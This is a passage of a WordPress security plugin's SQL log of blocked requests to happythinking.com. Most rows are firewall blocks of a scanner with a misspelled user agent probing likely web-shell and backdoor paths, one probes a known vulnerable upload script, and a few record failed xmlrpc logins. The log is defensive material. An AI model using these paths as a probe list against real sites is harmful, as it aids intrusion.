(51959, 1712640045.080413, 1712640044.558500, '\0\0\0\0\0\0\0\0\0\0ÿÿ-€`Ô', 0, 403, 0, 0, 0, 'https://happythinking.com/style.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3N0eWxlLnBocA==","category":"brute-force","ssl":1}'),
(51979, 1712689513.534061, 1712689513.185300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/doc.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2RvYy5waHA=","category":"brute-force","ssl":1}'),
(51960, 1712640035.364470, 1712640034.956100, '\0\0\0\0\0\0\0\0\0\0ÿÿ-€`Ô', 0, 403, 0, 0, 0, 'https://happythinking.com/chosen.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nob3Nlbi5waHA=","category":"brute-force","ssl":1}'),
(52062, 1712762216.267250, 1712762215.827800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/content.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NvbnRlbnQucGhw","category":"brute-force","ssl":1}'),
(51961, 1712640031.086424, 1712640030.674400, '\0\0\0\0\0\0\0\0\0\0ÿÿ-€`Ô', 0, 403, 0, 0, 0, 'https://happythinking.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(51962, 1712646083.710330, 1712646083.282800, '\0\0\0\0\0\0\0\0\0\0ÿÿ>7', 0, 403, 0, 0, 0, 'https://happythinking.com/', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV09XNjQ7IHJ2OjQ1LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNDUuMA==","path":"Lw==","category":"brute-force","ssl":1}'),
(51963, 0.000000, 1712652665.367374, '\0\0\0\0\0\0\0\0\0\0ÿÿ\\Í6‚', 0, 503, 0, 0, 0, 'https://happythinking.com/wp-login.php', 'https://happythinking.com/wp-login.php?redirect_to=https%3A%2F%2Fhappythinking.com%2Fwp-admin%2F', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51964, 1712659335.802089, 1712659335.052800, '\0\0\0\0\0\0\0\0\0\0ÿÿU×w2', 0, 403, 0, 0, 0, 'https://happythinking.com/inputs.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2lucHV0cy5waHA=","category":"brute-force","ssl":1}'),
(51978, 1712689517.097711, 1712689516.734900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/bak.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Jhay5waHA=","category":"brute-force","ssl":1}'),
(51965, 1712659332.387673, 1712659331.310900, '\0\0\0\0\0\0\0\0\0\0ÿÿU×w2', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/pwnd/pwnd.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9wd25kL3B3bmQucGhw","category":"brute-force","ssl":1}'),
(51966, 1712659328.446147, 1712659327.437100, '\0\0\0\0\0\0\0\0\0\0ÿÿU×w2', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-includes/inputs.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWluY2x1ZGVzL2lucHV0cy5waHA=","category":"brute-force","ssl":1}'),
(51977, 1712689520.435576, 1712689520.134900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/content.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NvbnRlbnQucGhw","category":"brute-force","ssl":1}'),
(51967, 1712659324.141218, 1712659323.384200, '\0\0\0\0\0\0\0\0\0\0ÿÿU×w2', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-admin/inputs.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWFkbWluL2lucHV0cy5waHA=","category":"brute-force","ssl":1}'),
(51976, 1712689525.028526, 1712689524.613700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/upfile.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3VwZmlsZS5waHA=","category":"brute-force","ssl":1}'),
(51968, 1712659320.830058, 1712659320.470900, '\0\0\0\0\0\0\0\0\0\0ÿÿU×w2', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/inputs.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvaW5wdXRzLnBocA==","category":"brute-force","ssl":1}'),
(52063, 1712762206.594112, 1712762206.173600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/bak.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Jhay5waHA=","category":"brute-force","ssl":1}'),
(51969, 1712659318.180525, 1712659317.786000, '\0\0\0\0\0\0\0\0\0\0ÿÿU×w2', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/fix/up.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9maXgvdXAucGhw","category":"brute-force","ssl":1}'),
(51975, 1712689530.874891, 1712689530.464100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/wp.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLnBocA==","category":"brute-force","ssl":1}'),
(51970, 1712659313.322254, 1712659312.835200, '\0\0\0\0\0\0\0\0\0\0ÿÿU×w2', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/themes/bute/lang.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL2J1dGUvbGFuZy5waHA=","category":"brute-force","ssl":1}'),
(51971, 1712659310.547847, 1712659310.174600, '\0\0\0\0\0\0\0\0\0\0ÿÿU×w2', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/work-list/lang.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93b3JrLWxpc3QvbGFuZy5waHA=","category":"brute-force","ssl":1}'),
(52064, 1712762188.427694, 1712762187.955000, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/doc.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2RvYy5waHA=","category":"brute-force","ssl":1}'),
(51974, 1712689534.221853, 1712689533.833400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/wp-conflg.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbmZsZy5waHA=","category":"brute-force","ssl":1}');
INSERT INTO `wpou_wfhits` VALUES
(51972, 1712663458.226880, 1712663457.757200, '\0\0\0\0\0\0\0\0\0\0ÿÿÂ&', 0, 403, 0, 0, 0, 'https://happythinking.com/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php', NULL, 'ALittle Client', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"QUxpdHRsZSBDbGllbnQ=","path":"L2FkbWluaXN0cmF0b3IvY29tcG9uZW50cy9jb21fbWFpYW5tZWRpYS91dGlsaXRpZXMvY2hhcnRzL3BocC1vZmMtbGlicmFyeS9vZmNfdXBsb2FkX2ltYWdlLnBocA==","category":"brute-force","ssl":1}'),
(51973, 1712689541.163752, 1712689540.804100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/bypass.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2J5cGFzcy5waHA=","category":"brute-force","ssl":1}'),
(50597, 1711720193.776321, 1711720193.378600, '\0\0\0\0\0\0\0\0\0\0ÿÿ^œ@', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/uploads/about.php?520=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdXBsb2Fkcy9hYm91dC5waHA=","category":"brute-force","ssl":1}'),
(50291, 1711080802.551684, 1711080802.242300, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/lufix.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2x1Zml4LnBocA==","category":"brute-force","ssl":1}'),
(50397, 0.000000, 1711224487.884163, '\0\0\0\0\0\0\0\0\0\0ÿÿ"W;Ö', 0, 200, 0, 0, 0, 'https://happythinking.com//xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(50398, 0.000000, 1711224489.853733, '\0\0\0\0\0\0\0\0\0\0ÿÿ"W;Ö', 0, 200, 0, 0, 0, 'https://happythinking.com//xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(50286, 1711080819.789337, 1711080819.462900, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/wp.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLnBocA==","category":"brute-force","ssl":1}'),
(50611, 1711731981.322014, 1711731980.901200, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com//wp-admin/mari.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly93cC1hZG1pbi9tYXJpLnBocA==","category":"brute-force","ssl":1}'),
(50410, 1711258364.387194, 1711258364.028400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿ/', 0, 403, 0, 0, 0, 'https://mail.happythinking.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', 